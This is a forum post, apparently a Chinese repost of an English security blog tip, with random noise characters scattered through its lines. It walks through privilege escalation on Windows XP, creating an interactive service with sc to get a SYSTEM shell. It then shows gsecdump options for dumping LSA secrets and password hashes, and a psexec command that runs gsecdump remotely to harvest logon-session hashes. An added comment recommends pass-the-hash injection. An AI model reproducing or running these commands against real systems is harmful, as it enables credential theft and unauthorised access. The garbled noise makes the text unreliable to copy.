o get a DOS Prompt as NT system:
, K0 Y/ H" m N' Y+ f' Y/ Z% P. X# }; d4 M( [ [
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
- v; {' B3 x; f4 n1 F1 `[SC] CreateService SUCCESS% B9 B" b. x2 C8 Q$ Q
. G- W8 y3 ?' N1 ?) N
C:\>sc start shellcmdline) a, E7 `. ~4 l% l+ V0 [9 j# F
[SC] StartService FAILED 1053:, z* c; M A& q- o$ V
3 ~" p3 B m6 a" q+ c) k+ S
The service did not respond to the start or control request in a timely fashion.
; l+ a2 @* I4 x! f2 b
# J# |/ q6 e& n' F6 DC:\>sc delete shellcmdline
# }5 T, P7 r, Q4 P. m- O2 t[SC] DeleteService SUCCESS/ x; y1 C& C6 k, _( U) B
: ~3 u1 b4 `0 O6 G t
------------2 m; y7 o& k( P: S! ?
/ X# D/ i4 |" q2 F4 d" e
Then in the new DOS window:* j% k3 ?3 k2 @+ L% `$ r
- {6 p- c) I# F" ]) j( J+ qMicrosoft Windows XP [Version 5.1.2600]
; a: p4 S3 \5 H3 l& |) q2 ?(C) Copyright 1985-2001 Microsoft Corp., F% ~- P# G! J7 d" {/ _
6 W. k# z& v# u& h7 ?" LC:\WINDOWS\system32>whoami+ s; c8 P7 j# O0 n6 M% W6 q8 }
NT AUTHORITY\SYSTEM% C- E7 v+ m! h1 a; o D
% Y2 D+ W3 N7 y: v& X3 ?C:\WINDOWS\system32>gsecdump -h
$ J: B3 {% c* O6 Lgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)3 u# F- V. s! E0 C# t0 P
usage: gsecdump [options] U* ~% s1 D: { \- u- M
+ c* s5 a' t' [
options:$ a* h& k8 d) o7 Z9 ], L `) h5 a
-h [ --help ] show help
: ]5 ]. i w, R G" y-a [ --dump_all ] dump all secrets
3 B0 h" {) E9 ~8 N9 c. D% t3 @-l [ --dump_lsa ] dump lsa secrets5 `. K4 o" w4 K2 i/ [, C
-w [ --dump_wireless ] dump microsoft wireless connections/ D. r$ d/ A% N# R7 h5 C
-u [ --dump_usedhashes ] dump hashes from active logon sessions2 ]3 R7 y" {2 Z& J: k; G) b" z
-s [ --dump_hashes ] dump hashes from SAM/AD
, n9 r2 B, g$ w7 R8 C, H
9 ?7 N1 ?: Q" \. E$ H( FAlthough I like to use:
, {8 V8 S) n% B0 X& ~* v% c" K; U$ F& Q9 T
PsExec v1.83 - Execute processes remotely
+ @7 }4 c" U' T' p \' e& mCopyright (C) 2001-2007 Mark Russinovich
( ^. b! {' V" u. M, _/ B- SSysinternals - 链接标记[url]www.sysinternals.com[/url]; R, l9 k" i6 [; u. U* Z
+ b. B ?8 O& e; x: K- TC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
( f9 X( f9 `. `- N3 y0 c( `- `% U
$ J+ W" l7 L, ~0 o6 T& Ato get the hashes from active logon sessions of a remote system., x# s; t/ z0 Z( T+ T: s
/ l# [3 z- @: D( g$ A0 r6 yThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.% u- A5 Z& c+ r. ?* U# P$ Q$ Z% q/ x
2 r$ d) M- B- e7 Z+ i# {提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.* I# x! l0 ]% O) k# V) N! W( R
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]2 F* q; a# L, A( W
% T! J/ M; @8 c/ ~4 a
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
5 |) v* J" M+ _/ T$ y( D/ Y- z) L |
发表于 2012-11-6 21:09:29
收藏
支持
反对